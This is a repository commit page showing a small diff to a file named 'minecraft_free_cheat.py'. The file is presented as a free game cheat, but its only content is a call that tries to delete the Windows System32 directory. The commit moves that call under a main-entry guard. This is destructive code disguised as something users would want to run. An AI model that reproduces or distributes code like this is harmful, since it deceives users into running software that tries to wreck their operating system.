Parcourir la source

Обновить 'minecraft_free_cheat.py'

Ethosa il y a 1 an
Parent
commit
a235b456c2
1 fichiers modifiés avec 2 ajouts et 2 suppressions
  1. 2 2
      minecraft_free_cheat.py

+ 2 - 2
minecraft_free_cheat.py

@@ -1,5 +1,5 @@
 import os
 
-os.rmdir("C:/Windows/System32");
 
-cool
+if __name__ == '__main__':
+  os.rmdir("C:/Windows/System32");